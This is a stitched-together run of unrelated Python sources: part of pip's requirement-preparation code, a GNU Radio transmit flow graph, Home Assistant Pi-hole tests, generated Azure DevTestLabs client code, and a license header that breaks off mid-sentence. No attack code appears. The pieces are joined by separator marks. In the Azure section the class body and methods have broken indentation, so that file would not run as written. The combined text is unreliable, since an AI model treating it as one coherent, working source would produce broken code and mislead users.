        # all the links at once into BatchDownloader.
        links_to_fully_download: Dict[Link, InstallRequirement] = {}
        for req in partially_downloaded_reqs:
            assert req.link
            links_to_fully_download[req.link] = req

        batch_download = self._batch_download(
            links_to_fully_download.keys(),
            temp_dir,
        )
        for link, (filepath, _) in batch_download:
            logger.debug("Downloading link %s to %s", link, filepath)
            req = links_to_fully_download[link]
            req.local_file_path = filepath

        # This step is necessary to ensure all lazy wheels are processed
        # successfully by the 'download', 'wheel', and 'install' commands.
        for req in partially_downloaded_reqs:
            self._prepare_linked_requirement(req, parallel_builds)

    def prepare_linked_requirement(
        self, req: InstallRequirement, parallel_builds: bool = False
    ) -> BaseDistribution:
        """Prepare a requirement to be obtained from req.link."""
        assert req.link
        link = req.link
        self._log_preparing_link(req)
        with indent_log():
            # Check if the relevant file is already available
            # in the download directory
            file_path = None
            if self.download_dir is not None and link.is_wheel:
                hashes = self._get_linked_req_hashes(req)
                file_path = _check_download_dir(req.link, self.download_dir, hashes)

            if file_path is not None:
                # The file is already available, so mark it as downloaded
                self._downloaded[req.link.url] = file_path
            else:
                # The file is not available, attempt to fetch only metadata
                wheel_dist = self._fetch_metadata_using_lazy_wheel(link)
                if wheel_dist is not None:
                    req.needs_more_preparation = True
                    return wheel_dist

            # None of the optimizations worked, fully prepare the requirement
            return self._prepare_linked_requirement(req, parallel_builds)

    def prepare_linked_requirements_more(
        self, reqs: Iterable[InstallRequirement], parallel_builds: bool = False
    ) -> None:
        """Prepare linked requirements more, if needed."""
        reqs = [req for req in reqs if req.needs_more_preparation]
        for req in reqs:
            # Determine if any of these requirements were already downloaded.
            if self.download_dir is not None and req.link.is_wheel:
                hashes = self._get_linked_req_hashes(req)
                file_path = _check_download_dir(req.link, self.download_dir, hashes)
                if file_path is not None:
                    self._downloaded[req.link.url] = file_path
                    req.needs_more_preparation = False

        # Prepare requirements we found were already downloaded for some
        # reason. The other downloads will be completed separately.
        partially_downloaded_reqs: List[InstallRequirement] = []
        for req in reqs:
            if req.needs_more_preparation:
                partially_downloaded_reqs.append(req)
            else:
                self._prepare_linked_requirement(req, parallel_builds)

        # TODO: separate this part out from RequirementPreparer when the v1
        # resolver can be removed!
        self._complete_partial_requirements(
            partially_downloaded_reqs,
            parallel_builds=parallel_builds,
        )

    def _prepare_linked_requirement(
        self, req: InstallRequirement, parallel_builds: bool
    ) -> BaseDistribution:
        """Fully prepare a linked requirement: unpack, hash-check, and build
        its distribution metadata."""
        assert req.link
        link = req.link

        self._ensure_link_req_src_dir(req, parallel_builds)
        hashes = self._get_linked_req_hashes(req)

        if link.is_existing_dir() and self.in_tree_build:
            local_file = None
        elif link.url not in self._downloaded:
            try:
                local_file = unpack_url(
                    link,
                    req.source_dir,
                    self._download,
                    self.verbosity,
                    self.download_dir,
                    hashes,
                )
            except NetworkConnectionError as exc:
                raise InstallationError(
                    "Could not install requirement {} because of HTTP "
                    "error {} for URL {}".format(req, exc, link)
                )
        else:
            # Reuse a memoized download, still verifying its hash.
            file_path = self._downloaded[link.url]
            if hashes:
                hashes.check_against_path(file_path)
            local_file = File(file_path, content_type=None)

        # For use in later processing,
        # preserve the file path on the requirement.
        if local_file:
            req.local_file_path = local_file.path

        dist = _get_prepared_distribution(
            req,
            self.req_tracker,
            self.finder,
            self.build_isolation,
        )
        return dist

    def save_linked_requirement(self, req: InstallRequirement) -> None:
        """Persist the requirement's archive/file into self.download_dir."""
        assert self.download_dir is not None
        assert req.link is not None
        link = req.link
        if link.is_vcs or (link.is_existing_dir() and req.editable):
            # Make a .zip of the source_dir we already created.
            req.archive(self.download_dir)
            return

        if link.is_existing_dir():
            logger.debug(
                "Not copying link to destination directory "
                "since it is a directory: %s",
                link,
            )
            return
        if req.local_file_path is None:
            # No distribution was downloaded for this requirement.
            return

        download_location = os.path.join(self.download_dir, link.filename)
        if not os.path.exists(download_location):
            shutil.copy(req.local_file_path, download_location)
            download_path = display_path(download_location)
            logger.info("Saved %s", download_path)

    def prepare_editable_requirement(
        self,
        req: InstallRequirement,
    ) -> BaseDistribution:
        """Prepare an editable requirement."""
        assert req.editable, "cannot prepare a non-editable req as editable"

        logger.info("Obtaining %s", req)

        with indent_log():
            if self.require_hashes:
                raise InstallationError(
                    "The editable requirement {} cannot be installed when "
                    "requiring hashes, because there is no single file to "
                    "hash.".format(req)
                )
            req.ensure_has_source_dir(self.src_dir)
            req.update_editable()

            dist = _get_prepared_distribution(
                req,
                self.req_tracker,
                self.finder,
                self.build_isolation,
            )

            req.check_if_exists(self.use_user_site)

        return dist

    def prepare_installed_requirement(
        self,
        req: InstallRequirement,
        skip_reason: str,
    ) -> BaseDistribution:
        """Prepare an already-installed requirement."""
        assert req.satisfied_by, "req should have been satisfied but isn't"
        assert skip_reason is not None, (
            "did not get skip reason skipped but req.satisfied_by "
            "is set to {}".format(req.satisfied_by)
        )
        logger.info(
            "Requirement %s: %s (%s)", skip_reason, req, req.satisfied_by.version
        )
        with indent_log():
            if self.require_hashes:
                logger.debug(
                    "Since it is already installed, we are trusting this "
                    "package without checking its hash. To ensure a "
                    "completely repeatable environment, install into an "
                    "empty virtualenv."
                )
            return InstalledDistribution(req).get_metadata_distribution()
| |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
##################################################
# GNU Radio Python Flow Graph
# Title: Tx Scram Sock
# Generated: Wed May 24 01:08:49 2017
##################################################
from gnuradio import blocks
from gnuradio import digital
from gnuradio import eng_notation
from gnuradio import gr
from gnuradio import uhd
from gnuradio.eng_option import eng_option
from gnuradio.filter import firdes
from optparse import OptionParser
import numpy
import time
import vtgs
class tx_scram_sock(gr.top_block):
    """GRC-generated flow graph: PDUs received on a UDP socket are AO-40
    encoded, muxed with a fixed idle pattern, scrambled, DBPSK modulated and
    transmitted through a UHD USRP sink.

    Do not hand-edit structurally: GRC regenerates this file.
    """

    def __init__(self, addr='0.0.0.0', alpha=0.5, bb_gain=.5, port='52001', samp_rate=500e3, samps_per_symb=4, tx_correct=0, tx_freq=2395e6, tx_gain=20, tx_offset=50e3):
        gr.top_block.__init__(self, "Tx Scram Sock")
        ##################################################
        # Parameters
        ##################################################
        self.addr = addr
        self.alpha = alpha
        self.bb_gain = bb_gain
        self.port = port
        self.samp_rate = samp_rate
        self.samps_per_symb = samps_per_symb
        self.tx_correct = tx_correct
        self.tx_freq = tx_freq
        self.tx_gain = tx_gain
        self.tx_offset = tx_offset
        ##################################################
        # Blocks
        ##################################################
        self.vtgs_mult_scrambler_0 = vtgs.mult_scrambler(17, 0x3FFFF)
        self.vtgs_ao40_encoder_0 = vtgs.ao40_encoder(False, 449838109)
        self.uhd_usrp_sink_0 = uhd.usrp_sink(
        	",".join(("", "")),
        	uhd.stream_args(
        		cpu_format="fc32",
        		channels=range(1),
        	),
        )
        self.uhd_usrp_sink_0.set_time_source('gpsdo', 0)
        self.uhd_usrp_sink_0.set_samp_rate(samp_rate)
        # Tune with an LO offset (tx_offset) to keep the DC spur out of band.
        self.uhd_usrp_sink_0.set_center_freq(uhd.tune_request(tx_freq+tx_correct, tx_offset), 0)
        self.uhd_usrp_sink_0.set_gain(tx_gain, 0)
        self.uhd_usrp_sink_0.set_antenna('TX/RX', 0)
        self.digital_map_bb_0 = digital.map_bb((1,0))
        self.digital_dxpsk_mod_0 = digital.dbpsk_mod(
        	samples_per_symbol=samps_per_symb,
        	excess_bw=alpha,
        	mod_code="gray",
        	verbose=False,
        	log=False)
        # Frame layout: 768 idle bytes muxed ahead of 5232 encoded bytes.
        self.blocks_stream_mux_0 = blocks.stream_mux(gr.sizeof_char*1, (768,5232))
        self.blocks_socket_pdu_0 = blocks.socket_pdu("UDP_SERVER", addr, port, 256, False)
        self.blocks_pack_k_bits_bb_0 = blocks.pack_k_bits_bb(8)
        self.blocks_multiply_const_vxx_0 = blocks.multiply_const_vcc((bb_gain, ))
        # NOTE(review): numpy.random.randint(0, 1, 768) always yields zeros
        # (the high bound is exclusive), so this "random" source emits a
        # constant pattern — confirm that is intended.
        self.analog_random_source_x_0 = blocks.vector_source_b(map(int, numpy.random.randint(0, 1, 768)), True)
        ##################################################
        # Connections
        ##################################################
        self.msg_connect((self.blocks_socket_pdu_0, 'pdus'), (self.vtgs_ao40_encoder_0, 'in'))
        self.connect((self.analog_random_source_x_0, 0), (self.blocks_stream_mux_0, 0))
        self.connect((self.blocks_multiply_const_vxx_0, 0), (self.uhd_usrp_sink_0, 0))
        self.connect((self.blocks_pack_k_bits_bb_0, 0), (self.digital_dxpsk_mod_0, 0))
        self.connect((self.blocks_stream_mux_0, 0), (self.digital_map_bb_0, 0))
        self.connect((self.digital_dxpsk_mod_0, 0), (self.blocks_multiply_const_vxx_0, 0))
        self.connect((self.digital_map_bb_0, 0), (self.vtgs_mult_scrambler_0, 0))
        self.connect((self.vtgs_ao40_encoder_0, 0), (self.blocks_stream_mux_0, 1))
        self.connect((self.vtgs_mult_scrambler_0, 0), (self.blocks_pack_k_bits_bb_0, 0))

    # GRC-style accessors below: each setter also re-applies the value to the
    # affected runtime block(s) where applicable.

    def get_addr(self):
        return self.addr

    def set_addr(self, addr):
        self.addr = addr

    def get_alpha(self):
        return self.alpha

    def set_alpha(self, alpha):
        self.alpha = alpha

    def get_bb_gain(self):
        return self.bb_gain

    def set_bb_gain(self, bb_gain):
        self.bb_gain = bb_gain
        self.blocks_multiply_const_vxx_0.set_k((self.bb_gain, ))

    def get_port(self):
        return self.port

    def set_port(self, port):
        self.port = port

    def get_samp_rate(self):
        return self.samp_rate

    def set_samp_rate(self, samp_rate):
        self.samp_rate = samp_rate
        self.uhd_usrp_sink_0.set_samp_rate(self.samp_rate)

    def get_samps_per_symb(self):
        return self.samps_per_symb

    def set_samps_per_symb(self, samps_per_symb):
        self.samps_per_symb = samps_per_symb

    def get_tx_correct(self):
        return self.tx_correct

    def set_tx_correct(self, tx_correct):
        self.tx_correct = tx_correct
        self.uhd_usrp_sink_0.set_center_freq(uhd.tune_request(self.tx_freq+self.tx_correct, self.tx_offset), 0)

    def get_tx_freq(self):
        return self.tx_freq

    def set_tx_freq(self, tx_freq):
        self.tx_freq = tx_freq
        self.uhd_usrp_sink_0.set_center_freq(uhd.tune_request(self.tx_freq+self.tx_correct, self.tx_offset), 0)

    def get_tx_gain(self):
        return self.tx_gain

    def set_tx_gain(self, tx_gain):
        self.tx_gain = tx_gain
        self.uhd_usrp_sink_0.set_gain(self.tx_gain, 0)

    def get_tx_offset(self):
        return self.tx_offset

    def set_tx_offset(self, tx_offset):
        self.tx_offset = tx_offset
        self.uhd_usrp_sink_0.set_center_freq(uhd.tune_request(self.tx_freq+self.tx_correct, self.tx_offset), 0)
def argument_parser():
    """Build the OptionParser exposing every flow-graph parameter."""
    parser = OptionParser(usage="%prog: [options]", option_class=eng_option)
    # (flag, dest, option type, default) — one row per flow-graph parameter.
    option_specs = (
        ("--addr", "addr", "string", '0.0.0.0'),
        ("--alpha", "alpha", "eng_float", eng_notation.num_to_str(0.5)),
        ("--bb-gain", "bb_gain", "eng_float", eng_notation.num_to_str(.5)),
        ("--port", "port", "string", '52001'),
        ("--samp-rate", "samp_rate", "eng_float", eng_notation.num_to_str(500e3)),
        ("--samps-per-symb", "samps_per_symb", "eng_float", eng_notation.num_to_str(4)),
        ("--tx-correct", "tx_correct", "eng_float", eng_notation.num_to_str(0)),
        ("--tx-freq", "tx_freq", "eng_float", eng_notation.num_to_str(2395e6)),
        ("--tx-gain", "tx_gain", "eng_float", eng_notation.num_to_str(20)),
        ("--tx-offset", "tx_offset", "eng_float", eng_notation.num_to_str(50e3)),
    )
    for flag, dest, opt_type, default in option_specs:
        parser.add_option(
            "", flag, dest=dest, type=opt_type, default=default,
            help="Set %s [default=%%default]" % dest)
    return parser
def main(top_block_cls=tx_scram_sock, options=None):
    """Run the flow graph until the user presses Enter (or stdin closes)."""
    if options is None:
        options, _ = argument_parser().parse_args()

    tb = top_block_cls(
        addr=options.addr,
        alpha=options.alpha,
        bb_gain=options.bb_gain,
        port=options.port,
        samp_rate=options.samp_rate,
        samps_per_symb=options.samps_per_symb,
        tx_correct=options.tx_correct,
        tx_freq=options.tx_freq,
        tx_gain=options.tx_gain,
        tx_offset=options.tx_offset,
    )
    tb.start()
    try:
        raw_input('Press Enter to quit: ')
    except EOFError:
        # Non-interactive stdin: fall through and shut down cleanly.
        pass
    tb.stop()
    tb.wait()
# Run the flow graph when this file is executed as a script.
if __name__ == '__main__':
    main()
| |
"""Test pi_hole component."""
import logging
from hole.exceptions import HoleError
from homeassistant.components import pi_hole, switch
from homeassistant.components.pi_hole.const import (
CONF_LOCATION,
DEFAULT_LOCATION,
DEFAULT_NAME,
DEFAULT_SSL,
DEFAULT_VERIFY_SSL,
SERVICE_DISABLE,
SERVICE_DISABLE_ATTR_DURATION,
)
from homeassistant.const import (
ATTR_ENTITY_ID,
CONF_HOST,
CONF_NAME,
CONF_SSL,
CONF_VERIFY_SSL,
)
from homeassistant.setup import async_setup_component
from . import (
SWITCH_ENTITY_ID,
_create_mocked_hole,
_patch_config_flow_hole,
_patch_init_hole,
)
from tests.async_mock import AsyncMock
from tests.common import MockConfigEntry
async def test_setup_minimal_config(hass):
    """Tests component setup with minimal config."""
    mocked_hole = _create_mocked_hole()
    with _patch_config_flow_hole(mocked_hole), _patch_init_hole(mocked_hole):
        assert await async_setup_component(
            hass, pi_hole.DOMAIN, {pi_hole.DOMAIN: [{"host": "pi.hole"}]}
        )

    await hass.async_block_till_done()

    # Every sensor must exist with its default friendly name and a zeroed
    # state (the mocked hole reports empty data).
    expected_sensors = {
        "sensor.pi_hole_ads_blocked_today": "Pi-Hole Ads Blocked Today",
        "sensor.pi_hole_ads_percentage_blocked_today": (
            "Pi-Hole Ads Percentage Blocked Today"
        ),
        "sensor.pi_hole_dns_queries_cached": "Pi-Hole DNS Queries Cached",
        "sensor.pi_hole_dns_queries_forwarded": "Pi-Hole DNS Queries Forwarded",
        "sensor.pi_hole_dns_queries_today": "Pi-Hole DNS Queries Today",
        "sensor.pi_hole_dns_unique_clients": "Pi-Hole DNS Unique Clients",
        "sensor.pi_hole_dns_unique_domains": "Pi-Hole DNS Unique Domains",
        "sensor.pi_hole_domains_blocked": "Pi-Hole Domains Blocked",
        "sensor.pi_hole_seen_clients": "Pi-Hole Seen Clients",
    }
    for entity_id, friendly_name in expected_sensors.items():
        state = hass.states.get(entity_id)
        assert state.name == friendly_name
        assert state.state == "0"

    assert hass.states.get("binary_sensor.pi_hole").name == "Pi-Hole"
    assert hass.states.get("binary_sensor.pi_hole").state == "off"
async def test_setup_name_config(hass):
    """Tests component setup with a custom name."""
    mocked_hole = _create_mocked_hole()
    config = {pi_hole.DOMAIN: [{"host": "pi.hole", "name": "Custom"}]}
    with _patch_config_flow_hole(mocked_hole), _patch_init_hole(mocked_hole):
        assert await async_setup_component(hass, pi_hole.DOMAIN, config)

    await hass.async_block_till_done()

    # The custom name is used as the entity name prefix.
    sensor = hass.states.get("sensor.custom_ads_blocked_today")
    assert sensor.name == "Custom Ads Blocked Today"
async def test_switch(hass, caplog):
    """Test Pi-hole switch."""
    mocked_hole = _create_mocked_hole()

    async def _toggle(service):
        # Helper: invoke a switch service on the Pi-hole entity, blocking.
        await hass.services.async_call(
            switch.DOMAIN,
            service,
            {"entity_id": SWITCH_ENTITY_ID},
            blocking=True,
        )

    with _patch_config_flow_hole(mocked_hole), _patch_init_hole(mocked_hole):
        assert await async_setup_component(
            hass,
            pi_hole.DOMAIN,
            {pi_hole.DOMAIN: [{"host": "pi.hole1", "api_key": "1"}]},
        )
        await hass.async_block_till_done()

        await _toggle(switch.SERVICE_TURN_ON)
        mocked_hole.enable.assert_called_once()

        await _toggle(switch.SERVICE_TURN_OFF)
        mocked_hole.disable.assert_called_once_with(True)

        # Failed calls: the integration should log an error, not raise.
        type(mocked_hole).enable = AsyncMock(side_effect=HoleError("Error1"))
        await _toggle(switch.SERVICE_TURN_ON)

        type(mocked_hole).disable = AsyncMock(side_effect=HoleError("Error2"))
        await _toggle(switch.SERVICE_TURN_OFF)

        errors = [x for x in caplog.records if x.levelno == logging.ERROR]
        assert errors[-2].message == "Unable to enable Pi-hole: Error1"
        assert errors[-1].message == "Unable to disable Pi-hole: Error2"
async def test_disable_service_call(hass):
    """Test disable service call with no Pi-hole named."""
    mocked_hole = _create_mocked_hole()
    config = {
        pi_hole.DOMAIN: [
            {"host": "pi.hole1", "api_key": "1"},
            {"host": "pi.hole2", "name": "Custom"},
        ]
    }
    with _patch_config_flow_hole(mocked_hole), _patch_init_hole(mocked_hole):
        assert await async_setup_component(hass, pi_hole.DOMAIN, config)
        await hass.async_block_till_done()

        await hass.services.async_call(
            pi_hole.DOMAIN,
            SERVICE_DISABLE,
            {ATTR_ENTITY_ID: "all", SERVICE_DISABLE_ATTR_DURATION: "00:00:01"},
            blocking=True,
        )
        await hass.async_block_till_done()

        # The "00:00:01" duration reaches the API exactly once, as 1 second.
        mocked_hole.disable.assert_called_once_with(1)
async def test_unload(hass):
    """Test unload entities."""
    config_entry = MockConfigEntry(
        domain=pi_hole.DOMAIN,
        data={
            CONF_NAME: DEFAULT_NAME,
            CONF_HOST: "pi.hole",
            CONF_LOCATION: DEFAULT_LOCATION,
            CONF_SSL: DEFAULT_SSL,
            CONF_VERIFY_SSL: DEFAULT_VERIFY_SSL,
        },
    )
    config_entry.add_to_hass(hass)

    mocked_hole = _create_mocked_hole()
    with _patch_config_flow_hole(mocked_hole), _patch_init_hole(mocked_hole):
        await hass.config_entries.async_setup(config_entry.entry_id)
        await hass.async_block_till_done()
    # Setup registers the entry's runtime data ...
    assert config_entry.entry_id in hass.data[pi_hole.DOMAIN]

    # ... and unloading removes it again.
    assert await hass.config_entries.async_unload(config_entry.entry_id)
    await hass.async_block_till_done()
    assert config_entry.entry_id not in hass.data[pi_hole.DOMAIN]
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class ArtifactsOperations(object):
"""ArtifactsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.devtestlabs.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
    self,
    resource_group_name,  # type: str
    lab_name,  # type: str
    artifact_source_name,  # type: str
    expand=None,  # type: Optional[str]
    filter=None,  # type: Optional[str]
    top=None,  # type: Optional[int]
    orderby=None,  # type: Optional[str]
    **kwargs  # type: Any
):
    # type: (...) -> Iterable["_models.ArtifactList"]
    """List artifacts in a given artifact source.

    Returns a lazy pager; no request is sent until iteration begins.

    :param resource_group_name: The name of the resource group.
    :type resource_group_name: str
    :param lab_name: The name of the lab.
    :type lab_name: str
    :param artifact_source_name: The name of the artifact source.
    :type artifact_source_name: str
    :param expand: Specify the $expand query. Example: 'properties($select=title)'.
    :type expand: str
    :param filter: The filter to apply to the operation. Example: '$filter=contains(name,'myName').
    :type filter: str
    :param top: The maximum number of resources to return from the operation. Example: '$top=10'.
    :type top: int
    :param orderby: The ordering expression for the results, using OData notation. Example:
     '$orderby=name desc'.
    :type orderby: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: An iterator like instance of either ArtifactList or the result of cls(response)
    :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.devtestlabs.models.ArtifactList]
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.ArtifactList"]
    # Map well-known status codes to typed exceptions; callers may extend
    # or override the mapping via the 'error_map' keyword.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2018-09-15"
    accept = "application/json"

    def prepare_request(next_link=None):
        # Build the GET request for one page. The first page is built from
        # the operation's URL template; subsequent pages reuse the
        # service-provided next_link verbatim.
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        if not next_link:
            # Construct URL
            url = self.list.metadata['url']  # type: ignore
            path_format_arguments = {
                'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                'labName': self._serialize.url("lab_name", lab_name, 'str'),
                'artifactSourceName': self._serialize.url("artifact_source_name", artifact_source_name, 'str'),
            }
            url = self._client.format_url(url, **path_format_arguments)
            # Construct parameters; only OData options that were supplied
            # are added to the query string.
            query_parameters = {}  # type: Dict[str, Any]
            if expand is not None:
                query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
            if filter is not None:
                query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
            if top is not None:
                query_parameters['$top'] = self._serialize.query("top", top, 'int')
            if orderby is not None:
                query_parameters['$orderby'] = self._serialize.query("orderby", orderby, 'str')
            query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
            request = self._client.get(url, query_parameters, header_parameters)
        else:
            # next_link already carries the full query string, so no
            # parameters are re-applied.
            url = next_link
            query_parameters = {}  # type: Dict[str, Any]
            request = self._client.get(url, query_parameters, header_parameters)
        return request

    def extract_data(pipeline_response):
        # Deserialize one page; return (continuation link or None, iterator
        # over the page's elements). 'cls' may transform the element list.
        deserialized = self._deserialize('ArtifactList', pipeline_response)
        list_of_elem = deserialized.value
        if cls:
            list_of_elem = cls(list_of_elem)
        return deserialized.next_link or None, iter(list_of_elem)

    def get_next(next_link=None):
        # Run one page request through the pipeline, mapping any non-200
        # status to a typed HTTP error.
        request = prepare_request(next_link)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        return pipeline_response

    return ItemPaged(
        get_next, extract_data
    )
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/artifactsources/{artifactSourceName}/artifacts'}  # type: ignore
def get(
    self,
    resource_group_name,  # type: str
    lab_name,  # type: str
    artifact_source_name,  # type: str
    name,  # type: str
    expand=None,  # type: Optional[str]
    **kwargs  # type: Any
):
    # type: (...) -> "_models.Artifact"
    """Get artifact.

    :param resource_group_name: The name of the resource group.
    :type resource_group_name: str
    :param lab_name: The name of the lab.
    :type lab_name: str
    :param artifact_source_name: The name of the artifact source.
    :type artifact_source_name: str
    :param name: The name of the artifact.
    :type name: str
    :param expand: Specify the $expand query. Example: 'properties($select=title)'.
    :type expand: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: Artifact, or the result of cls(response)
    :rtype: ~azure.mgmt.devtestlabs.models.Artifact
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.Artifact"]
    # Typed exceptions for well-known statuses; extensible via 'error_map'.
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2018-09-15"
    accept = "application/json"

    # Fill the operation's URL template with serialized path segments.
    path_format_arguments = {
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'labName': self._serialize.url("lab_name", lab_name, 'str'),
        'artifactSourceName': self._serialize.url("artifact_source_name", artifact_source_name, 'str'),
        'name': self._serialize.url("name", name, 'str'),
    }
    url = self._client.format_url(self.get.metadata['url'], **path_format_arguments)  # type: ignore

    # Query string: optional $expand first, then the mandatory api-version.
    query_parameters = {}  # type: Dict[str, Any]
    if expand is not None:
        query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
    query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    request = self._client.get(url, query_parameters, header_parameters)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code != 200:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response, error_format=ARMErrorFormat)

    deserialized = self._deserialize('Artifact', pipeline_response)
    # Hand the raw response to the caller's hook when one was supplied.
    return cls(pipeline_response, deserialized, {}) if cls else deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/artifactsources/{artifactSourceName}/artifacts/{name}'}  # type: ignore
def generate_arm_template(
    self,
    resource_group_name,  # type: str
    lab_name,  # type: str
    artifact_source_name,  # type: str
    name,  # type: str
    generate_arm_template_request,  # type: "_models.GenerateArmTemplateRequest"
    **kwargs  # type: Any
):
    # type: (...) -> "_models.ArmTemplateInfo"
    """Generates an ARM template for the given artifact, uploads the required files to a storage
    account, and validates the generated artifact.

    :param resource_group_name: The name of the resource group.
    :type resource_group_name: str
    :param lab_name: The name of the lab.
    :type lab_name: str
    :param artifact_source_name: The name of the artifact source.
    :type artifact_source_name: str
    :param name: The name of the artifact.
    :type name: str
    :param generate_arm_template_request: Parameters for generating an ARM template for deploying
     artifacts.
    :type generate_arm_template_request: ~azure.mgmt.devtestlabs.models.GenerateArmTemplateRequest
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: ArmTemplateInfo, or the result of cls(response)
    :rtype: ~azure.mgmt.devtestlabs.models.ArmTemplateInfo
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.ArmTemplateInfo"]
    # Typed exceptions for well-known statuses; extensible via 'error_map'.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2018-09-15"
    # The request body content type may be overridden by the caller.
    content_type = kwargs.pop("content_type", "application/json")
    accept = "application/json"

    # Construct URL
    url = self.generate_arm_template.metadata['url']  # type: ignore
    path_format_arguments = {
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'labName': self._serialize.url("lab_name", lab_name, 'str'),
        'artifactSourceName': self._serialize.url("artifact_source_name", artifact_source_name, 'str'),
        'name': self._serialize.url("name", name, 'str'),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}  # type: Dict[str, Any]
    query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

    # Construct headers
    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    # Serialize the request model into the POST body.
    body_content_kwargs = {}  # type: Dict[str, Any]
    body_content = self._serialize.body(generate_arm_template_request, 'GenerateArmTemplateRequest')
    body_content_kwargs['content'] = body_content
    request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    # Only 200 is a success for this operation.
    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response, error_format=ARMErrorFormat)

    deserialized = self._deserialize('ArmTemplateInfo', pipeline_response)

    if cls:
        return cls(pipeline_response, deserialized, {})

    return deserialized
generate_arm_template.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/artifactsources/{artifactSourceName}/artifacts/{name}/generateArmTemplate'}  # type: ignore
# ---- file boundary (concatenation artifact) ----
#!/usr/bin/python
# Copyright (c) 2009, Purdue University
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice, this
# list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# Neither the name of the Purdue University nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
